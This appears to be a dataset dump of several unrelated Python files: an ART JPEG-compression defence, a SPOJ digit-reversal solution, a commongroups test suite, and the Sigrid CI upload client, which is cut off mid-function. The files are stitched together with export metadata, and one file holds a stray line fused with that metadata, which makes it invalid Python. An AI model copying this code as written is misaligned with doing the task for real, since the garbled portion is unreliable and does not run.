        return self._apply_fit

    @property
    def apply_predict(self) -> bool:
        return self._apply_predict

    def _compress(self, x: np.ndarray, mode: str) -> np.ndarray:
        """
        Apply JPEG compression to a single uint8 image and return the decoded result.
        """
        from PIL import Image

        tmp_jpeg = BytesIO()
        x_image = Image.fromarray(x, mode=mode)
        x_image.save(tmp_jpeg, format="jpeg", quality=self.quality)
        x_jpeg = np.array(Image.open(tmp_jpeg))
        tmp_jpeg.close()
        return x_jpeg

    def __call__(self, x: np.ndarray, y: Optional[np.ndarray] = None) -> Tuple[np.ndarray, Optional[np.ndarray]]:
        """
        Apply JPEG compression to sample `x`.

        :param x: Sample to compress with shape of `NCHW`, `NHWC`, `NCFHW` or `NFHWC`. `x` values are expected to be in
                  the data range [0, 1] or [0, 255].
        :param y: Labels of the sample `x`. This function does not affect them in any way.
        :return: compressed sample.
        """
        x_ndim = x.ndim
        if x_ndim not in [4, 5]:
            raise ValueError(
                "Unrecognized input dimension. JPEG compression can only be applied to image and video data."
            )

        if x.min() < 0.0:
            raise ValueError(
                "Negative values in input `x` detected. The JPEG compression defence requires unnormalized input."
            )

        # Swap channel index so everything below can assume channels-last.
        if self.channels_first and x_ndim == 4:
            # image shape NCHW to NHWC
            x = np.transpose(x, (0, 2, 3, 1))
        elif self.channels_first and x_ndim == 5:
            # video shape NCFHW to NFHWC
            x = np.transpose(x, (0, 2, 3, 4, 1))

        # insert temporal dimension to image data so both image and video
        # inputs are handled uniformly as NFHWC
        if x_ndim == 4:
            x = np.expand_dims(x, axis=1)

        # Convert into uint8 (JPEG operates on 8-bit samples)
        if self.clip_values[1] == 1.0:
            x = x * 255
        x = x.astype("uint8")

        # Set image mode
        if x.shape[-1] == 1:
            image_mode = "L"
        elif x.shape[-1] == 3:
            image_mode = "RGB"
        else:
            raise NotImplementedError("Currently only support `RGB` and `L` images.")

        # Prepare grayscale images for "L" mode (PIL expects 2-D input)
        if image_mode == "L":
            x = np.squeeze(x, axis=-1)

        # Compress one image at a time
        x_jpeg = x.copy()
        for idx in tqdm(np.ndindex(x.shape[:2]), desc="JPEG compression"):
            x_jpeg[idx] = self._compress(x[idx], image_mode)

        # Undo preparation grayscale images for "L" mode
        if image_mode == "L":
            x_jpeg = np.expand_dims(x_jpeg, axis=-1)

        # Convert back to the original data range and the ART dtype
        if self.clip_values[1] == 1.0:
            x_jpeg = x_jpeg / 255.0
        x_jpeg = x_jpeg.astype(ART_NUMPY_DTYPE)

        # remove temporal dimension for image data
        if x_ndim == 4:
            x_jpeg = np.squeeze(x_jpeg, axis=1)

        # Swap channel index back to the caller's layout
        if self.channels_first and x_jpeg.ndim == 4:
            # image shape NHWC to NCHW
            x_jpeg = np.transpose(x_jpeg, (0, 3, 1, 2))
        elif self.channels_first and x_ndim == 5:
            # video shape NFHWC to NCFHW
            x_jpeg = np.transpose(x_jpeg, (0, 4, 1, 2, 3))

        return x_jpeg, y

    def estimate_gradient(self, x: np.ndarray, grad: np.ndarray) -> np.ndarray:
        # The compression step is not differentiated here; the incoming
        # gradient is returned unchanged.
        return grad

    def fit(self, x: np.ndarray, y: Optional[np.ndarray] = None, **kwargs) -> None:
        """
        No parameters to learn for this method; do nothing.
        """
        pass

    def _check_params(self) -> None:
        # FIX: `np.int` was deprecated in NumPy 1.20 and removed in 1.24;
        # `np.integer` accepts all NumPy integer scalar types, which is the
        # original intent of allowing numpy ints here.
        if not isinstance(self.quality, (int, np.integer)) or self.quality <= 0 or self.quality > 100:
            raise ValueError("Image quality must be a positive integer <= 100.")

        if len(self.clip_values) != 2:
            raise ValueError("'clip_values' should be a tuple of 2 floats or arrays containing the allowed data range.")

        if np.array(self.clip_values[0] >= self.clip_values[1]).any():
            raise ValueError("Invalid 'clip_values': min >= max.")

        if self.clip_values[0] != 0:
            raise ValueError("'clip_values' min value must be 0.")

        if self.clip_values[1] != 1.0 and self.clip_values[1] != 255:
            raise ValueError("'clip_values' max value must be either 1 or 255.")
| 39.146789 | 120 | 0.641551 |
1e0624e15aa5581eb0621e7c27eb9f6dbbb9cd13 | 231 | py | Python | AdHoc/ADDREV.py | PK-100/Competitive_Programming | d0863feaaa99462b2999e85dcf115f7a6c08bb8d | [
"MIT"
] | 70 | 2018-06-25T21:20:15.000Z | 2022-03-24T03:55:17.000Z | AdHoc/ADDREV.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 4 | 2018-09-04T13:12:20.000Z | 2021-06-20T08:29:12.000Z | AdHoc/ADDREV.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 24 | 2018-12-26T05:15:32.000Z | 2022-01-23T23:04:54.000Z | # Problem: https://www.spoj.com/IITRPRF1/problems/ADDREV/
def rev(n):
    """Return the integer formed by reversing the decimal digits of n.

    Leading zeros of the reversed number are dropped by the int() conversion.
    """
    return int(str(n)[::-1])
# Read t test cases; each line holds two numbers given in reversed-digit form.
# FIX: the final print line had stray dataset-export metadata fused onto it
# ("| 17.769231 | 57 | 0.61039 |"), which made the file a syntax error.
t = int(input())
for _ in range(t):
    m, n = [int(x) for x in input().strip().split()]
    # Add the true (reversed) values, then reverse the sum for output --
    # this also drops leading zeros, as the ADDREV problem requires.
    s = rev(m) + rev(n)
    print(rev(s))
print(rev(s)) | 17.769231 | 57 | 0.61039 |
b8f38690af9e648addd16f928f8ada07719f1bc3 | 5,483 | py | Python | commongroups/tests/test_commongroups.py | akokai/commongroups | 03c67b7f015c7f939a2f8122583dee1b38e64a56 | [
"MIT"
] | 3 | 2017-04-27T06:49:38.000Z | 2020-09-20T13:47:49.000Z | commongroups/tests/test_commongroups.py | akokai/commongroups | 03c67b7f015c7f939a2f8122583dee1b38e64a56 | [
"MIT"
] | 7 | 2017-03-23T20:08:03.000Z | 2017-11-13T03:59:37.000Z | commongroups/tests/test_commongroups.py | akokai/commongroups | 03c67b7f015c7f939a2f8122583dee1b38e64a56 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Test suite for commongroups program architecture.
For tests of database query logic, stay tuned...
Depends:
Home environment is configured; structure-searchable database exists and
PostgreSQL is running; Google Sheets access is configured.
Side-effects:
Creates directories and log files.
"""
# pylint: disable=invalid-name,missing-docstring
from itertools import islice
import json
import os
from os.path import exists, join as pjoin
from pkg_resources import resource_filename, resource_string
from pandas import DataFrame
import pytest
from sqlalchemy.engine import Engine
from sqlalchemy.sql import Select
from commongroups.cmgroup import CMGroup
from commongroups.env import CommonEnv
from commongroups.errors import MissingParamError, NoCredentialsError
from commongroups.hypertext import directory
from commongroups.googlesheet import SheetManager
from commongroups.ops import (batch_process,
cmgs_from_file,
cmgs_from_googlesheet,
collect_to_json)
from commongroups.query import QueryMethod, get_query_results
# Path (inside the test package) to the group-parameter fixture file.
PARAMS_JSON = resource_filename(__name__, 'params.json')
# Same fixture, parsed: a list of {'params': ..., 'info': ...} dicts.
LOCAL_PARAMS = json.loads(resource_string(__name__, 'params.json').decode())
# Deliberately incomplete parameters, used to exercise MissingParamError.
PAR_FAIL_QM = {'cmg_id': 'x666666', 'name': 'Incomplete parameters'}
TEST_LIMIT = 5

# Instantiate a few objects to run multiple tests on:
# NOTE: these run at import time and require a configured home environment
# plus a reachable PostgreSQL instance (see the module docstring).
env = CommonEnv('test', google_worksheet='test')
env.connect_database()
blank_env = CommonEnv(env_path=env.results_path)
# Define a few generic helper functions for the tests.
def check_params(params):
    """
    Verify that group parameters read from file or Google Sheet are OK.

    The argument should be a params data structure for creating a single
    group (a dict with 'params' and 'info' keys, where 'info' carries a
    'notes' entry), not a list of parameters for many groups.
    """
    assert isinstance(params, dict)
    for required in ('params', 'info'):
        assert required in params.keys()
    assert 'notes' in params['info'].keys()
def check_cmg(cmg):
    # Shared assertions for a freshly created CMGroup: the id/params/info
    # attributes have the expected types and info carries 'notes'.
    assert isinstance(cmg, CMGroup)
    assert isinstance(cmg.cmg_id, str)
    assert isinstance(cmg.params, dict)
    assert isinstance(cmg.info, dict)
    assert 'notes' in cmg.info
    # add_info() must merge new keys into the existing info dict.
    cmg.add_info({'Added info': 'Success!'})
    assert 'Added info' in cmg.info
# Tests:
def test_env_config():
    """Config values are exposed; an unconfigured env raises MissingParamError."""
    assert env.config['google_worksheet'] == 'test'
    assert len(blank_env.config) == 0
    with pytest.raises(MissingParamError):
        blank_env.connect_database()
    with pytest.raises(MissingParamError):
        # Creating the generator should already fail on the missing params.
        gen = cmgs_from_googlesheet(blank_env)
def test_env_db():
    """connect_database() exposes a SQLAlchemy Engine (needs running PostgreSQL)."""
    env.connect_database()
    assert isinstance(env.database, Engine)
def test_cmgs_IO():
    """Round-trip: params file -> CMGroups -> collected JSON and HTML directory."""
    for params in LOCAL_PARAMS:
        check_params(params)
    cmg_gen_json = cmgs_from_file(env, PARAMS_JSON)
    cmgs = list(islice(cmg_gen_json, None))
    assert len(cmgs) > 2
    for cmg in cmgs:
        check_cmg(cmg)
    # Side effect: collect_to_json() writes cmgroups.json under results_path.
    coll_json_path = pjoin(env.results_path, 'cmgroups.json')
    collect_to_json(cmgs, env)
    assert exists(coll_json_path)
    # Side effect: directory() writes the HTML index page.
    html_dir_path = pjoin(env.results_path, 'html', 'index.html')
    directory(cmgs, env)
    assert exists(html_dir_path)
def test_googlesheet():
    """Google Sheets access: bad credentials fail; a valid sheet yields groups and JSON."""
    with pytest.raises(NoCredentialsError):
        gsm = SheetManager('Untitled', 'Sheet 1', 'KEYFILE.DNE')
    sheet = SheetManager(env.config['google_sheet_title'],
                         env.config['google_worksheet'],
                         env.config['google_key_file'])
    google_params = list(islice(sheet.get_params(), None))
    for params in google_params:
        check_params(params)
    cmg_gen = cmgs_from_googlesheet(env)
    cmgs = list(islice(cmg_gen, None))
    assert len(cmgs) > 2
    for cmg in cmgs:
        check_cmg(cmg)
    # Side effect: params_to_json() writes the parsed params to disk.
    path = pjoin(env.results_path, 'google_params.json')
    sheet.params_to_json(path)
    assert exists(path)
def test_querymethod():
    """QueryMethod rejects incomplete params and builds a runnable SELECT."""
    for params in [PAR_FAIL_QM, ]:
        with pytest.raises(MissingParamError):
            bad_qmd = QueryMethod(params)
    qmd = QueryMethod(LOCAL_PARAMS[0]['params'])
    assert isinstance(qmd.get_literal(), str)
    assert isinstance(qmd.expression, Select)
    # Limit the query so the test stays fast regardless of database size.
    qmd.expression = qmd.expression.limit(TEST_LIMIT)
    res = get_query_results(qmd.expression, env.database)
    assert isinstance(res, DataFrame)
    assert len(res) == TEST_LIMIT
def test_cmg_process():
    """CMGroup.process() populates compounds and info, then exports JSON/HTML."""
    cmg = CMGroup(env, LOCAL_PARAMS[0]['params'], LOCAL_PARAMS[0]['info'])
    cmg.create_query()
    assert isinstance(cmg.query, QueryMethod)
    assert isinstance(cmg.query.get_literal(), str)
    assert isinstance(cmg.query.expression, Select)
    # Use the process() method
    cmg.process(env.database)
    assert isinstance(cmg.compounds, DataFrame)
    assert isinstance(cmg.info, dict)
    assert 'about' in cmg.info
    assert isinstance(cmg.info['count'], int)
    # The SQL recorded in info must match the query that produced the results.
    assert cmg.info['sql'] == cmg.query.get_literal()
    cmg.to_json()
    cmg.to_html(formats=['json'])
def test_batch_process():
    """batch_process() writes JSON/XLSX/HTML for every group plus an index page."""
    cmg_gen = cmgs_from_file(env, PARAMS_JSON)
    cmgs_done = batch_process(cmg_gen, env)
    for cmg in cmgs_done:
        check_cmg(cmg)
        assert exists(
            pjoin(cmg.results_path, '{}.json'.format(cmg.cmg_id))
        )
        assert exists(
            pjoin(cmg.results_path, '{}.xlsx'.format(cmg.cmg_id))
        )
        assert exists(
            pjoin(cmg.results_path, 'html', '{}.html'.format(cmg.cmg_id))
        )
    assert exists(pjoin(env.results_path, 'html', 'index.html'))
| 31.331429 | 79 | 0.696881 |
aab370f7ae7a2c26319af0dd800be937d809261f | 302 | py | Python | cfopenapi/blueprints/core.py | joaopcanario/cfopen-api | 3a91736feaaab02160344c9d49a9a21be1eaa621 | [
"MIT"
] | null | null | null | cfopenapi/blueprints/core.py | joaopcanario/cfopen-api | 3a91736feaaab02160344c9d49a9a21be1eaa621 | [
"MIT"
] | null | null | null | cfopenapi/blueprints/core.py | joaopcanario/cfopen-api | 3a91736feaaab02160344c9d49a9a21be1eaa621 | [
"MIT"
] | null | null | null | from flask import Blueprint, redirect, url_for, jsonify
core_bp = Blueprint("core_bp", __name__)
@core_bp.route('/', methods=['GET'])
def root():
try:
return redirect(url_for('flasgger.apidocs')), 302
except Exception:
return jsonify("API Documentation isn't loaded!"), 200
| 23.230769 | 62 | 0.678808 |
d91ed4fbf3c8e626f4aabee96db4012540973a47 | 59 | py | Python | syncplay/__init__.py | weeb-poly/syncplay-proxy | 71e7a847bd684dcfef35fe290d47d2c328b25743 | [
"Apache-2.0"
] | 2 | 2021-09-06T18:42:16.000Z | 2022-03-07T19:29:56.000Z | syncplay/__init__.py | weeb-poly/syncplay-proxy | 71e7a847bd684dcfef35fe290d47d2c328b25743 | [
"Apache-2.0"
] | null | null | null | syncplay/__init__.py | weeb-poly/syncplay-proxy | 71e7a847bd684dcfef35fe290d47d2c328b25743 | [
"Apache-2.0"
] | 1 | 2021-12-30T15:33:07.000Z | 2021-12-30T15:33:07.000Z | projectURL = 'https://github.com/weeb-poly/syncplay-proxy'
| 29.5 | 58 | 0.762712 |
1e583dc7dccb91cc1a05f53b56d187a09c980e5a | 20,216 | py | Python | sigridci/sigridci.py | Software-Improvement-Group/sigridci | c3c4b248a6b8cfcbf0b0c7634413e3c5816ff9f0 | [
"Apache-2.0"
] | 15 | 2021-02-17T10:52:16.000Z | 2022-03-09T09:57:53.000Z | sigridci/sigridci.py | Software-Improvement-Group/sigridci | c3c4b248a6b8cfcbf0b0c7634413e3c5816ff9f0 | [
"Apache-2.0"
] | 18 | 2021-02-17T14:51:06.000Z | 2022-03-23T08:44:51.000Z | sigridci/sigridci.py | Software-Improvement-Group/sigridci | c3c4b248a6b8cfcbf0b0c7634413e3c5816ff9f0 | [
"Apache-2.0"
] | 11 | 2021-02-17T11:27:55.000Z | 2022-03-07T15:06:39.000Z | #!/usr/bin/env python3
# Copyright Software Improvement Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import base64
import datetime
import dataclasses
import html
import json
import os
import re
import sys
import time
import typing
import urllib.parse
import urllib.request
import zipfile
# All messages logged so far; used elsewhere for end-of-run reporting.
LOG_HISTORY = []


def log(message):
    """Print *message* prefixed with a timestamp and record it in LOG_HISTORY."""
    now = datetime.datetime.now()
    print(now.strftime("%Y-%m-%d %H:%M:%S") + " " + message, flush=True)
    LOG_HISTORY.append(message)
@dataclasses.dataclass
class UploadOptions:
    # Root directory of the source code to upload.
    sourceDir: str = None
    # Patterns to exclude from the upload -- presumably path/glob patterns;
    # confirm against SystemUploadPacker, which consumes these options.
    excludePatterns: typing.List[str] = dataclasses.field(default_factory=lambda: [])
    # Whether to include repository history in the upload.
    includeHistory: bool = False
    # Prefix prepended to paths inside the upload archive.
    pathPrefix: str = ""
    # When True, list the upload's contents (diagnostic aid).
    showContents: bool = False
@dataclasses.dataclass
class TargetQuality:
    # Map from metric name (upper case, e.g. "MAINTAINABILITY") to the
    # minimum rating required for that metric.
    ratings: typing.Dict[str, float]

    def __init__(self, configFile, targetRating):
        """Load per-metric targets from configFile; maintainability defaults to targetRating."""
        self.ratings = {"MAINTAINABILITY" : targetRating}

        if os.path.exists(configFile):
            log(f"Loading target quality level from configuration file {configFile}")
            # We can't use pyyaml because PIP is not available in some of the
            # very diverse set of customer environments where Sigrid CI is used.
            # NOTE(review): Report.METRICS is defined elsewhere in this file;
            # the pattern matches config lines of the form "<metric>: <number>".
            targetPattern = re.compile("(" + "|".join(Report.METRICS) + "):\s*([\d\.]+)", re.IGNORECASE)

            for line in open(configFile, "r"):
                match = targetPattern.match(line.strip())
                if match:
                    self.ratings[match.group(1).upper()] = float(match.group(2))

    def meetsTargetQualityForMetric(self, feedback, metric):
        # A missing rating or a metric without a configured target counts as
        # "meets target" (only explicit failures block the pipeline).
        value = feedback["newCodeRatings"].get(metric, None)
        targetRating = self.ratings.get(metric, None)
        return value == None or targetRating == None or value >= targetRating

    def meetsOverallQualityTarget(self, feedback):
        # Every configured metric must individually meet its target.
        return all(self.meetsTargetQualityForMetric(feedback, metric) for metric in self.ratings)
class SigridApiClient:
PROTOCOL_VERSION = "v1"
POLL_INTERVAL = 60
POLL_ATTEMPTS = 60
RETRY_ATTEMPTS = 5
def __init__(self, args):
    """Initialise the client from parsed CLI arguments.

    Credentials come from the mandatory SIGRID_CI_ACCOUNT and SIGRID_CI_TOKEN
    environment variables (KeyError if either is unset).
    """
    self.baseURL = args.sigridurl
    self.account = os.environ["SIGRID_CI_ACCOUNT"]
    self.token = os.environ["SIGRID_CI_TOKEN"]
    # URL-encode the lower-cased identifiers once, so every request path can
    # embed them verbatim.
    self.urlPartnerName = urllib.parse.quote_plus(args.partner.lower())
    self.urlCustomerName = urllib.parse.quote_plus(args.customer.lower())
    self.urlSystemName = urllib.parse.quote_plus(args.system.lower())
    self.publish = args.publish or args.publishonly
def callSigridAPI(self, api, path):
    """Perform an authenticated GET against the Sigrid REST API.

    Returns the parsed JSON body, or {} for a 204/empty response.
    Raises urllib.error.HTTPError for non-2xx responses.
    """
    url = f"{self.baseURL}/rest/{api}{path}"
    request = urllib.request.Request(url, None)
    request.add_header("Accept", "application/json")
    # HTTP basic auth with the account/token pair.
    request.add_header("Authorization", \
        b"Basic " + base64.standard_b64encode(f"{self.account}:{self.token}".encode("utf8")))

    response = urllib.request.urlopen(request)
    if response.status == 204:
        return {}
    responseBody = response.read().decode("utf8")
    if len(responseBody) == 0:
        log("Received empty response")
        return {}
    return json.loads(responseBody)
def submitUpload(self, options):
log("Creating upload")
uploadPacker = SystemUploadPacker(options)
upload = "sigrid-upload-" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S") + ".zip"
uploadPacker.prepareUpload(options.sourceDir, upload)
log("Preparing upload")
uploadLocation = self.obtainUploadLocation()
uploadUrl = uploadLocation["uploadUrl"]
analysisId = uploadLocation["ciRunId"]
log(f"Sigrid CI analysis ID: {analysisId}")
log("Publishing upload" if self.publish else "Submitting upload")
if not self.uploadBinaryFile(uploadUrl, upload):
raise Exception("Uploading file failed")
return analysisId
def obtainUploadLocation(self):
for attempt in range(self.RETRY_ATTEMPTS):
try:
return self.callSigridAPI("inboundresults", self.getRequestUploadPath())
except urllib.error.HTTPError as e:
if e.code == 502:
log("Retrying")
time.sleep(self.POLL_INTERVAL)
else:
self.processHttpError(e)
log("Sigrid is currently unavailable")
sys.exit(1)
def getRequestUploadPath(self):
path = f"/{self.urlPartnerName}/{self.urlCustomerName}/{self.urlSystemName}/ci/uploads/{self.PROTOCOL_VERSION}"
if self.publish:
path += "/publish"
return path
def uploadBinaryFile(self, url, upload):
with open(upload, "rb") as uploadRef:
uploadRequest = urllib.request.Request(url, data=uploadRef.read())
uploadRequest.method = "PUT"
uploadRequest.add_header("Content-Type", "application/zip")
uploadRequest.add_header("Content-Length", "%d" % os.path.getsize(upload))
uploadRequest.add_header("x-amz-server-side-encryption", "AES256")
uploadResponse = urllib.request.urlopen(uploadRequest)
return uploadResponse.status in [200, 201, 202]
def fetchAnalysisResults(self, analysisId):
for attempt in range(self.POLL_ATTEMPTS):
try:
response = self.callSigridAPI("analysis-results",
f"/sigridci/{self.urlCustomerName}/{self.urlSystemName}/{self.PROTOCOL_VERSION}/ci/results/{analysisId}")
if response != {}:
return response
except urllib.error.HTTPError as e:
self.processHttpError(e)
except json.JSONDecodeError as e:
log("Received incomplete analysis results")
log("Waiting for analysis results")
time.sleep(self.POLL_INTERVAL)
log("Analysis failed: waiting for analysis results took too long")
sys.exit(1)
def processHttpError(self, e):
if e.code in [401, 403]:
log("You are not authorized to access Sigrid for this system")
sys.exit(1)
elif e.code == 404:
log("Analysis results not yet available")
elif e.code >= 500:
log(f"Sigrid is currently not available (HTTP status {e.code})")
sys.exit(1)
else:
raise Exception(f"Received HTTP status {e.code}")
class SystemUploadPacker:
    """Packs a source directory into the zip file that is uploaded to Sigrid."""

    MAX_UPLOAD_SIZE_MB = 500

    # Directories/extensions that are never relevant for analysis.
    DEFAULT_EXCLUDES = [
        "coverage/",
        "build/",
        "dist/",
        "node_modules/",
        "sigridci/",
        "sigrid-ci-output/",
        "target/",
        ".idea/",
        ".jpg",
        ".png"
    ]

    def __init__(self, options):
        self.excludePatterns = [] + (options.excludePatterns or []) + self.DEFAULT_EXCLUDES
        self.excludePatterns = [excl for excl in self.excludePatterns if excl != ""]
        if not options.includeHistory:
            # Without history the repository metadata is not needed.
            self.excludePatterns += [".git/", ".gitmodules"]
        self.pathPrefix = options.pathPrefix.strip("/")
        self.showContents = options.showContents

    def prepareUpload(self, sourceDir, outputFile):
        """Walk sourceDir and write all non-excluded files to the zip outputFile.

        Raises an exception (via checkUploadContents) when the resulting
        upload exceeds the maximum size.
        """
        # Context manager guarantees the zip is flushed/closed even when
        # adding a file raises (the original leaked the handle on error).
        with zipfile.ZipFile(outputFile, "w", zipfile.ZIP_DEFLATED) as zipFile:
            for root, dirs, files in os.walk(sourceDir):
                for file in sorted(files):
                    filePath = os.path.join(root, file)
                    # NOTE(review): this compares the bare file name against the
                    # full output path, so it only skips the zip itself when
                    # outputFile has no directory component -- confirm callers.
                    if file != outputFile and not self.isExcluded(filePath):
                        relativePath = os.path.relpath(os.path.join(root, file), sourceDir)
                        uploadPath = self.getUploadFilePath(relativePath)
                        if self.showContents:
                            log(f"Adding file to upload: {uploadPath}")
                        zipFile.write(filePath, uploadPath)
        self.checkUploadContents(outputFile)

    def checkUploadContents(self, outputFile):
        """Sanity-check the size of the generated upload."""
        uploadSizeBytes = os.path.getsize(outputFile)
        uploadSizeMB = max(round(uploadSizeBytes / 1024 / 1024), 1)
        log(f"Upload size is {uploadSizeMB} MB")

        if uploadSizeMB > self.MAX_UPLOAD_SIZE_MB:
            raise Exception(f"Upload exceeds maximum size of {self.MAX_UPLOAD_SIZE_MB} MB")

        if uploadSizeBytes < 50000:
            log("Warning: Upload is very small, source directory might not contain all source code")

    def getUploadFilePath(self, relativePath):
        """Prepend the configured path prefix, if any, to a path inside the zip."""
        if self.pathPrefix == "":
            return relativePath
        return f"{self.pathPrefix}/{relativePath}"

    def isExcluded(self, filePath):
        """Return True when the slash-normalized path matches any exclude pattern."""
        normalizedPath = filePath.replace("\\", "/")
        return any(exclude.strip() in normalizedPath for exclude in self.excludePatterns)
class Report:
    """Base class for Sigrid CI feedback reports.

    Subclasses implement generate() to render the analysis feedback in a
    specific output format (plain text, static HTML, process exit code).
    """

    # All system properties reported by Sigrid, in display order.
    METRICS = ["VOLUME", "DUPLICATION", "UNIT_SIZE", "UNIT_COMPLEXITY", "UNIT_INTERFACING", "MODULE_COUPLING",
               "COMPONENT_BALANCE_PROP", "COMPONENT_INDEPENDENCE", "COMPONENT_ENTANGLEMENT", "MAINTAINABILITY"]

    # Subset of metrics for which refactoring candidates are reported.
    REFACTORING_CANDIDATE_METRICS = ["DUPLICATION", "UNIT_SIZE", "UNIT_COMPLEXITY", "UNIT_INTERFACING",
                                     "MODULE_COUPLING"]

    def generate(self, feedback, args, target):
        """Render the feedback; implemented by subclasses."""
        pass

    def formatRating(self, ratings, metric, naText="N/A"):
        """Return the rating for metric formatted with one decimal,
        or naText when the rating is absent."""
        # `is None` instead of `== None`; also covers a missing key via get().
        if ratings.get(metric, None) is None:
            return naText
        return "%.1f" % ratings[metric]

    def formatBaseline(self, feedback):
        """Return the baseline snapshot date as YYYY-MM-DD, or N/A when absent."""
        if not feedback.get("baseline", None):
            return "N/A"
        snapshotDate = datetime.datetime.strptime(feedback["baseline"], "%Y%m%d")
        return snapshotDate.strftime("%Y-%m-%d")

    def getSigridUrl(self, args):
        """Return the URL of the system's landing page in Sigrid."""
        return "https://sigrid-says.com/" + urllib.parse.quote_plus(args.customer) + "/" + \
               urllib.parse.quote_plus(args.system)

    def getRefactoringCandidates(self, feedback, metric):
        """Return the refactoring candidates reported for the given metric."""
        refactoringCandidates = feedback.get("refactoringCandidates", [])
        return [rc for rc in refactoringCandidates if rc["metric"] == metric]
class TextReport(Report):
    """Renders Sigrid CI feedback as colored plain text on the console."""

    # ANSI escape sequences used to color console output.
    ANSI_BOLD = "\033[1m"
    ANSI_GREEN = "\033[92m"
    ANSI_YELLOW = "\033[33m"
    ANSI_RED = "\033[91m"
    ANSI_BLUE = "\033[96m"

    # Width of the horizontal separator lines.
    LINE_WIDTH = 91

    def generate(self, feedback, args, target):
        """Print the refactoring candidates followed by the ratings table."""
        self.printHeader("Refactoring candidates")
        for metric in self.REFACTORING_CANDIDATE_METRICS:
            self.printMetric(feedback, metric)
        self.printHeader("Maintainability ratings")
        print("System property".ljust(40) + f"Baseline ({self.formatBaseline(feedback)}) New/changed code Target")
        for metric in self.METRICS:
            if metric == "MAINTAINABILITY":
                # Separator line before the overall maintainability row.
                print("-" * self.LINE_WIDTH)
            fields = (metric.replace("_PROP", "").title().replace("_", " "), \
                "(" + self.formatRating(feedback["overallRatings"], metric) + ")", \
                self.formatRating(feedback["newCodeRatings"], metric), \
                str(target.ratings.get(metric, "")))
            self.printColor("%-40s%-25s%-20s%s" % fields, self.getRatingColor(feedback, target, metric))

    def printHeader(self, header):
        """Print a section header between separator lines."""
        print("")
        print("-" * self.LINE_WIDTH)
        print(header)
        print("-" * self.LINE_WIDTH)

    def printMetric(self, feedback, metric):
        """Print the refactoring candidates for a single metric."""
        print("")
        print(metric.replace("_PROP", "").title().replace("_", " "))
        refactoringCandidates = self.getRefactoringCandidates(feedback, metric)
        if len(refactoringCandidates) == 0:
            print(" None")
        else:
            for rc in refactoringCandidates:
                print(self.formatRefactoringCandidate(rc))

    def getRatingColor(self, feedback, target, metric):
        """Blue for metrics without rating/target, green when the target is
        met, red otherwise."""
        if feedback["newCodeRatings"].get(metric, None) == None or not metric in target.ratings:
            return self.ANSI_BLUE
        elif target.meetsTargetQualityForMetric(feedback, metric):
            return self.ANSI_GREEN
        else:
            return self.ANSI_RED

    def formatRefactoringCandidate(self, rc):
        """Format one refactoring candidate as an indented list item."""
        category = ("(" + rc["category"] + ")").ljust(14)
        # Continuation lines of the subject are indented under the category.
        subject = rc["subject"].replace("\n", "\n" + (" " * 21)).replace("::", "\n" + (" " * 21))
        return f" - {category} {subject}"

    def printColor(self, message, ansiPrefix):
        # \033[0m resets the terminal color after the message.
        print(ansiPrefix + message + "\033[0m")
class StaticHtmlReport(Report):
    """Renders Sigrid CI feedback as a static HTML page.

    Fills the sigridci-feedback-template.html template (shipped next to
    this script) and writes the result to sigrid-ci-output/index.html.
    """

    HTML_STAR_FULL = "★"
    HTML_STAR_EMPTY = "☆"

    def generate(self, feedback, args, target):
        """Write the HTML report and print where to find it."""
        if not os.path.exists("sigrid-ci-output"):
            os.mkdir("sigrid-ci-output")

        with open(os.path.dirname(__file__) + "/sigridci-feedback-template.html", encoding="utf-8", mode="r") as templateRef:
            template = templateRef.read()
            template = self.renderHtmlFeedback(template, feedback, args, target)

        reportFile = os.path.abspath("sigrid-ci-output/index.html")
        # Context manager so the report file is closed even if writing fails
        # (the original open/write/close leaked the handle on error).
        with open(reportFile, encoding="utf-8", mode="w") as writer:
            writer.write(template)

        print("")
        print("You can find the full results here:")
        print(" " + reportFile)
        print("")
        print("You can find more information about these results in Sigrid:")
        print(" " + self.getSigridUrl(args))
        print("")

    def renderHtmlFeedback(self, template, feedback, args, target):
        """Fill all @@@PLACEHOLDER markers in the template with feedback values."""
        placeholders = {
            "CUSTOMER" : html.escape(args.customer),
            "SYSTEM" : html.escape(args.system),
            "TARGET" : "%.1f" % target.ratings["MAINTAINABILITY"],
            "LINES_OF_CODE_TOUCHED" : "%d" % feedback.get("newCodeLinesOfCode", 0),
            "BASELINE_DATE" : self.formatBaseline(feedback),
            "SIGRID_LINK" : self.getSigridUrl(args),
            "MAINTAINABILITY_PASSED" : ("passed" if target.meetsOverallQualityTarget(feedback) else "failed")
        }

        # Per-metric placeholders: ratings, star widgets, pass/fail, candidates.
        for metric in self.METRICS:
            placeholders[f"{metric}_OVERALL"] = self.formatRating(feedback["overallRatings"], metric)
            placeholders[f"{metric}_NEW"] = self.formatRating(feedback["newCodeRatings"], metric)
            placeholders[f"{metric}_TARGET"] = self.formatRating(target.ratings, metric, "")
            placeholders[f"{metric}_STARS_OVERALL"] = self.formatHtmlStars(feedback["overallRatings"], metric)
            placeholders[f"{metric}_STARS_NEW"] = self.formatHtmlStars(feedback["newCodeRatings"], metric)
            placeholders[f"{metric}_PASSED"] = self.formatPassed(feedback, target, metric)
            placeholders[f"{metric}_REFACTORING_CANDIDATES"] = self.formatRefactoringCandidates(feedback, metric)

        return self.fillPlaceholders(template, placeholders)

    def fillPlaceholders(self, template, placeholders):
        """Replace every @@@NAME marker in the template with its value."""
        for placeholder, value in placeholders.items():
            template = template.replace(f"@@@{placeholder}", value)
        return template

    def formatPassed(self, feedback, target, metric):
        """Return passed/failed for a metric, or '' when it has no target."""
        if target.ratings.get(metric, None) is None:
            return ""
        return "passed" if target.meetsTargetQualityForMetric(feedback, metric) else "failed"

    def formatRefactoringCandidates(self, feedback, metric):
        """Render the refactoring candidates for one metric as HTML."""
        refactoringCandidates = self.getRefactoringCandidates(feedback, metric)
        if len(refactoringCandidates) == 0:
